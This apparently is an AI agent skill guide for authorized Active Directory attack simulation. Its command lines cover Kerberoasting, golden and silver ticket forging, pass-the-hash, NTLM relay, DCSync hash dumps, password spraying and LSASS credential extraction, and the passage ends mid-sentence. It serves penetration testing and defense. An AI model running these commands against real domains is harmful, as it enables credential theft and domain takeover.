executing-active-directory-attack-simulation

What this skill does

# Executing Active Directory Attack Simulation

## When to Use

- Assessing the security of an Active Directory domain and forest against common and advanced attack techniques
- Identifying attack paths from low-privilege domain user to Domain Admin using privilege relationship analysis
- Validating that Kerberos security configurations, credential policies, and delegation settings resist known attacks
- Testing detection capabilities of the SOC and EDR tools against Active Directory-specific TTPs
- Evaluating the effectiveness of tiered administration models and privileged access workstations

**Do not use** without explicit written authorization from the domain owner, against production domain controllers during business hours unless approved, or for testing that could cause account lockouts affecting real users without prior coordination.

## Prerequisites

- Written authorization specifying the target AD domain, testing constraints, and any off-limits accounts or systems
- Low-privilege domain user account (minimum starting point) to simulate realistic attacker position
- Testing workstation joined to the domain or network access to domain controllers on ports 88, 135, 139, 389, 445, 636, 3268, 3269
- BloodHound Community Edition or Enterprise with SharpHound/AzureHound collectors
- Impacket toolkit, Mimikatz (or pypykatz), Rubeus, and CrackMapExec installed on the attack platform
- Hashcat or John the Ripper with current wordlists (rockyou.txt, SecLists) for offline credential cracking

## Workflow

### Step 1: Active Directory Reconnaissance

Enumerate the AD environment from a low-privilege domain user position:

- **Domain enumeration**: `Get-ADDomain` or `crackmapexec smb <dc_ip> -u <user> -p <pass> --domains` to identify domain name, functional level, domain controllers, and forest trusts
- **User enumeration**: `Get-ADUser -Filter * -Properties ServicePrincipalName,AdminCount,PasswordLastSet` to identify service accounts, privileged accounts, and stale passwords
- **Group enumeration**: Map membership of high-value groups (Domain Admins, Enterprise Admins, Schema Admins, Account Operators, Backup Operators) using `net group "Domain Admins" /domain`
- **GPO enumeration**: `Get-GPO -All | Get-GPOReport -ReportType XML` to identify Group Policy configurations including password policies, audit settings, and software deployment
- **Trust enumeration**: `nltest /domain_trusts /all_trusts` to map inter-domain and inter-forest trusts, noting trust direction and transitivity
- **LDAP queries**: Use `ldapsearch` or ADExplorer to search for accounts with `userAccountControl` flags indicating "password never expires", "password not required", or "DES-only Kerberos"

### Step 2: BloodHound Attack Path Analysis

Collect and analyze AD relationship data to identify the shortest paths to Domain Admin:

- Run SharpHound collector: `SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\temp\` to collect users, groups, sessions, ACLs, trusts, and GPO data
- Import the JSON output into BloodHound and run built-in queries:
  - "Shortest Paths to Domain Admins from Owned Principals"
  - "Find Principals with DCSync Rights"
  - "Find Computers where Domain Users are Local Admin"
  - "Shortest Paths to Unconstrained Delegation Systems"
  - "Find All Paths from Kerberoastable Users"
- Mark the compromised user as "owned" in BloodHound and analyze the resulting attack paths
- Identify ACL-based attack paths: GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword on high-value objects
- Document each identified attack path with the chain of relationships and affected objects

### Step 3: Kerberos Attacks

Execute Kerberos-based attacks against identified vulnerable accounts:

- **Kerberoasting**: Request TGS tickets for accounts with SPNs: `impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request -outputfile kerberoast.hashes`. Crack offline with `hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt`
- **AS-REP Roasting**: Target accounts without Kerberos pre-authentication: `impacket-GetNPUsers <domain>/ -dc-ip <dc_ip> -usersfile users.txt -format hashcat -outputfile asrep.hashes`. Crack with `hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt`
- **Silver Ticket**: If a service account's NTLM hash is cracked, forge a TGS ticket for that service using `impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn <service/host> <username>`
- **Golden Ticket**: If the krbtgt hash is obtained (post-domain compromise), forge a TGT: `mimikatz "kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<hash> /ticket:golden.kirbi"`
- **Unconstrained Delegation abuse**: Identify computers with unconstrained delegation. Coerce authentication from a Domain Controller using PrinterBug or PetitPotam, then capture the DC's TGT from memory.

### Step 4: Credential Attacks and Lateral Movement

Exploit harvested credentials to move through the domain:

- **Pass-the-Hash**: `impacket-psexec <domain>/<user>@<target> -hashes <LM:NTLM>` to execute commands on systems where the compromised account has local admin
- **Pass-the-Ticket**: `export KRB5CCNAME=ticket.ccache && impacket-psexec <domain>/<user>@<target> -k -no-pass` to use captured or forged Kerberos tickets
- **NTLM Relay**: Configure `impacket-ntlmrelayx -t ldap://<dc_ip> --escalate-user <user>` and coerce authentication to relay NTLM credentials for privilege escalation
- **DCSync**: If DCSync rights are obtained (Replicating Directory Changes): `impacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc-ntlm` to dump all domain password hashes
- **Password spraying**: `crackmapexec smb <dc_ip> -u users.txt -p 'Winter2025!' --no-bruteforce` testing one password across all accounts to avoid lockouts
- **LSASS dump**: On compromised hosts, extract credentials from LSASS memory using `mimikatz "sekurlsa::logonpasswords"` or `procdump -ma lsass.exe lsass.dmp` followed by offline extraction

### Step 5: Privilege Escalation to Domain Admin

Chain discovered attack paths to escalate from low-privilege user to Domain Admin:

- Follow the shortest path identified in BloodHound by executing each relationship (e.g., GenericWrite on a user -> set SPN -> Kerberoast -> crack password -> user is member of a group with WriteDACL on Domain Admins -> grant self membership)
- Exploit Group Policy Preferences (GPP) passwords if found: `crackmapexec smb <dc_ip> -u <user> -p <pass> -M gpp_autologon`
- Target LAPS (Local Administrator Password Solution) if deployed: query LAPS passwords with `Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd`
- Abuse certificate services (AD CS) with Certipy: `certipy find -vulnerable -u <user>@<domain> -p <pass> -dc-ip <dc_ip>` to find exploitable certificate templates (ESC1-ESC8)
- Document the complete attack chain from initial user to Domain Admin with every credential, tool, and technique used

## Key Concepts

| Term | Definition |
|------|------------|
| **Kerberoasting** | Requesting Kerberos TGS tickets for accounts with Service Principal Names and cracking them offline to recover the service account's plaintext password |
| **AS-REP Roasting** | Requesting Kerberos AS-REP responses for accounts without pre-authentication enabled and cracking the encrypted timestamp offline |
| **DCSync** | Using Directory Replication Service privileges (DS-Replication-Get-Changes-All) to replicate password data from a domain controller, mimicking the behavior of a DC |
| **BloodHound** | Graph-based Active Directory analysis tool that maps privilege relationships and identifies attack paths from any user to high-value targets like Domain Admin |
| **Unconstrained Delegation** | A Kerberos delegation configuration where a service can impersonate any user to any other service, allowing TGT capture from connecting users |
| **Pass-the-Hash** | Authentication technique using an NTLM hash directly instead of the plaintext password, exploi